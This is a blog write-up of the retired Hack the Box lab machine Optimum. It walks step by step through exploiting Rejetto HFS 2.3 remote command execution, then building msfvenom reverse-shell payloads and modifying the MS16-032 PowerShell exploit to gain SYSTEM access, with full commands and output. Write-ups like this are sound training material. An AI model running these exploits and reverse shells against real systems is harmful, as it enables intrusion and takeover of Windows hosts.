This is a write-up of the retired Optimum box on Hack the Box.
First thing I did was to fire up nmap and ran this command.
nmap -sV -sC -oA optimum 10.10.10.8
And got this result.
Nmap scan report for 10.10.10.8 Host is up (0.42s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 80/tcp open http HttpFileServer httpd 2.3 |_http-server-header: HFS 2.3 |_http-title: HFS / Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 112.77 seconds
So only port 80 was open and it was a HttpFileServer.
HTTP File Server, otherwise known as HFS, is a free web server specifically designed for publishing and sharing files. The complete feature set differs from other web servers; it lacks some common features, like CGI, or even ability to run as a Windows service, but includes, for example, counting file downloads. It is even advised against using it as an ordinary web server.
Source: https://en.wikipedia.org/wiki/HTTP_File_Server
I opened the service on the web browser and it was just a dashboard of the HFS.
The version of the HFS was 2.3 so I searchploited it.
root@kali:~/Documents/HTB/Optimum# searchsploit hfs ------------------------------------------------------------------------------------------------- ---------------------------------- Exploit Title | Path | (/usr/share/exploitdb/platforms/) ------------------------------------------------------------------------------------------------- ---------------------------------- Apple Mac OSX 10.4.8 - DMG HFS+ DO_HFS_TRUNCATE Denial of Service | osx/dos/29454.txt Apple Mac OSX 10.6 - HFS FileSystem Exploit (Denial of Service) | osx/dos/12375.c Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure | osx/local/35488.c Apple Mac OSX xnu 1228.x - (hfs-fcntl) Kernel Privilege Escalation | osx/local/8266.txt FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution | windows/remote/37985.py Linux Kernel 2.6.x - SquashFS Double-Free Denial of Service | linux/dos/28895.txt Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit) | windows/remote/34926.rb Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities | windows/remote/31056.py Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload | multiple/remote/30850.txt Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1) | windows/remote/34668.txt Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) | windows/remote/39161.py Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution | windows/webapps/34852.txt ------------------------------------------------------------------------------------------------- ----------------------------------
So there were multiple exploits available for HFS version 2.3.
The first exploit that I used was this.
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) | windows/remote/39161.py
I copied the exploit and named it as exploit.py on my directory. After I copied the exploit, I modified a few lines of codes and entered my IP address and local port number to listen to.
root@kali:~/Documents/HTB/Optimum# nano exploit.py # changed the following lines ip_addr = "10.10.14.116" #local IP address local_port = "9999" # Local Port number root@kali:~/Documents/HTB/Optimum# python exploit.py [.]Something went wrong..! Usage is :[.] python exploit.py <Target IP address> <Target Port Number> Don't forgot to change the Local IP address and Port number on the script root@kali:~/Documents/HTB/Optimum# python exploit.py 10.10.10.8 80 # Open new Terminal Tab root@kali:~/Documents/HTB/Optimum# nc -lvp 9999
After running the exploit and opened a new terminal for the netcat listener, I got an access to the shell. This means that the exploit worked, however, I was not able to do other things so I need to have a meterpreter access to run the privilege escalation suggester and use the suggested privesc exploits to have a root access on the system.
Good thing there was a metasploit module of the HFS exploit. So I fired up metasploit and used the exploit.
msf > search hfs Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/multi/http/git_client_command_exec 2014-12-18 excellent Malicious Git and Mercurial HTTP Server For CVE-2014-9390 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Rejetto HttpFileServer Remote Command Execution
msf > use exploit/windows/http/rejetto_hfs_exec msf exploit(rejetto_hfs_exec) > set RHOST 10.10.10.8 RHOST => 10.10.10.8 msf exploit(rejetto_hfs_exec) > set SRVPORT 7777 SRVPORT => 7777 msf exploit(rejetto_hfs_exec) > run [*] Started reverse TCP handler on 10.10.14.116:4444 [*] Using URL: http://0.0.0.0:7777/YqQuLmjEaXD [*] Local IP: http://192.168.8.102:7777/YqQuLmjEaXD [*] Server started. [*] Sending a malicious request to / [*] Payload request received: /YqQuLmjEaXD [*] Sending stage (179267 bytes) to 10.10.10.8 [*] Meterpreter session 1 opened (10.10.14.116:4444 -> 10.10.10.8:49239) at 2017-10-14 09:51:34 -0400 [*] Server stopped. [!] This exploit may require manual cleanup of '%TEMP%\pCrVCNhk.vbs' on the target
Got a meterpreter session.
meterpreter > meterpreter > sysinfo Computer : OPTIMUM OS : Windows 2012 R2 (Build 9600). Architecture : x64 System Language : el_GR Domain : HTB Logged On Users : 1 Meterpreter : x86/windows
I needed to background first the session so that I am able to run the exploit suggester for windows.
meterpreter > background [*] Backgrounding session 1... msf exploit(rejetto_hfs_exec) > search suggester Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- post/multi/recon/local_exploit_suggester normal Multi Recon Local Exploit Suggester msf exploit(rejetto_hfs_exec) > use post/multi/recon/local_exploit_suggester msf post(local_exploit_suggester) > set SESSION 1 SESSION => 1 msf post(local_exploit_suggester) > run [*] 10.10.10.8 - Collecting local exploits for x86/windows... [*] 10.10.10.8 - 37 exploit checks are being tried... [+] 10.10.10.8 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable. [+] 10.10.10.8 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated. [+] 10.10.10.8 - exploit/windows/local/ms_ndproxy: The target service is running, but could not be validated. [*] Post module execution completed msf post(local_exploit_suggester) > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc msf exploit(ms16_032_secondary_logon_handle_privesc) > msf exploit(ms16_032_secondary_logon_handle_privesc) > run msf exploit(ms16_032_secondary_logon_handle_privesc) > set SESSION 2 [*] Started reverse TCP handler on 192.168.8.102:4444 [!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell [*] Writing payload file, C:\Users\kostas\Desktop\cbOzoCyJAykO.txt... [*] Compressing script contents... [+] Compressed size: 3596 [*] Executing exploit script... [+] Cleaned up C:\Users\kostas\Desktop\cbOzoCyJAykO.txt [*] Exploit completed, but no session was created. msf exploit(ms16_032_secondary_logon_handle_privesc) >
The ms16_032_secondary_logon_handle_privesc exploit was an exploit for Windows 2012 R2 (Build 9600) but it didn’t work and there was no session created. However, there was a manual exploit script for the ms16_032_secondary_logon_handle_privesc and I will use that exploit to have a root access on the system.
So I downloaded the exploit from exploitdb.
https://www.exploit-db.com/exploits/39719/
The exploit was a powershell script. So for the exploit to work, I needed to have an interactive powershell access on the system to run the script, so what I did was to create a reverse powershell payload using msfvenom.
root@kali:~/Documents/HTB/Optimum# msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.116 LPORT=5555 -f exe > shell.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 1802 bytes Final size of exe file: 8192 bytes
After the payload was created, I fired up metasploit on the other tab to use the handler to catch the reverse powershell.
Reverse Powershell Tab
msf > use exploit/multi/handler msf exploit(handler) > set payload payload/windows/x64/powershell_reverse_tcp [-] The value specified for payload is not valid. msf exploit(handler) > set payload windows/x64/powershell_reverse_tcp payload => windows/x64/powershell_reverse_tcp msf exploit(handler) > set LHOST 10.10.14.116 LHOST => 10.10.14.116 msf exploit(handler) > set LPORT 5555 LPORT => 5555 msf exploit(handler) > exploit -j -z [*] Exploit running as background job 0. msf exploit(handler) > [*] Started reverse SSL handler on 10.10.14.116:5555 msf exploit(handler) >
After creating the handler I uploaded and executed the reverse powershell.
meterpreter > pwd C:\Users\kostas\Desktop meterpreter > upload shell.exe [*] uploading : shell.exe -> shell.exe [*] uploaded : shell.exe -> shell.exe meterpreter > execute -f shell.exe
On the Reverse Powershell Tab, I got a powershell session.
msf exploit(handler) > [*] Powershell session session 2 opened (10.10.14.116:5555 -> 10.10.10.8:49251) at 2017-10-14 10:22:40 -0400
So it’s time to modify the ms16-032 script to work.
# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED $CallResult = [Advapi32]::CreateProcessWithLogonW( "user", "domain", "pass", 0x00000002, "C:\Windows\System32\cmd.exe", "", #change this to your reverse shell. 0x00000004, $null, $GetCurrentPath, [ref]$StartupInfo, [ref]$ProcessInfo)
I needed to create another reverse shell using msfvenom and change a few line of codes in the ms16-032 script to execute the reverse shell as root.
# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED $CallResult = [Advapi32]::CreateProcessWithLogonW( "user", "domain", "pass", 0x00000002, "C:\Users\kostas\Desktop\yourrevshell.exe", "", #changed 0x00000004, $null, $GetCurrentPath, [ref]$StartupInfo, [ref]$ProcessInfo)
I needed to open another handler again on metasploit to catch the reverse shell and to have a root access on the system.
And after modifying the script and creating the handler, it’s time to execute the exploit using the interactive powershell.
Reverse Powershell Tab
PS C:\Users\kostas\Desktop> ./MS16-032.ps1 PS C:\Users\kostas\Desktop> Import-Module ./MS16-032.ps1 PS C:\Users\kostas\Desktop> Invoke-MS16-032 __ __ ___ ___ ___ ___ ___ ___ | V | _|_ | | _|___| |_ |_ | | |_ |_| |_| . |___| | |_ | _| |_|_|_|___|_____|___| |___|___|___| [by b33f -> @FuzzySec] [?] Operating system core count: 2 [>] Duplicating CreateProcessWithLogonW handle [?] Done, using thread handle: 2172 [*] Sniffing out privileged impersonation token.. [?] Thread belongs to: svchost [+] Thread suspended [>] Wiping current impersonation token [>] Building SYSTEM impersonation token [?] Success, open SYSTEM token handle: 2168 [+] Resuming thread.. [*] Sniffing out SYSTEM shell.. [>] Duplicating SYSTEM token [>] Starting token race [>] Starting process race [!] Holy handle leak Batman, we have a SYSTEM shell!! PS C:\Users\kostas\Desktop>
And on the reverse shell handler tab, you can see that it already caught the reverse shell executed by the exploit and there it goes, I already had a root access on the system.
Reverse Shell Tab
msf exploit(handler) > [*] Sending stage (179267 bytes) to 10.10.10.8 [*] Meterpreter session 2 opened (10.10.14.116:1337 -> 10.10.10.8:50253) at 2017-10-14 12:23:26 -0400 msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > shell Process 752 created. Channel 1 created. Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Users\kostas\Desktop>whoami whoami nt authority\system C:\Users\kostas\Desktop>more user.txt.txt more user.txt.txt d0c39409d7b994a9a1389ebf38ef5f73 C:\Users\kostas\Desktop>cd C:\Users cd C:\Users C:\Users>cd Administrator cd Administrator C:\Users\Administrator>cd Desktop cd Desktop C:\Users\Administrator\Desktop>more root.txt more root.txt 51ed1b36553c8461f4552c2e92b3eeed C:\Users\Administrator\Desktop>
I have now the user and root hashes of the box.
Subscribe for more!
To stay up to date with my latest posts and more InfoSec guides, make sure to subscribe to this blog by entering your email address below.
I promise I won’t be spamming your mailbox. Because no one loves spam. AMIRIGHT?
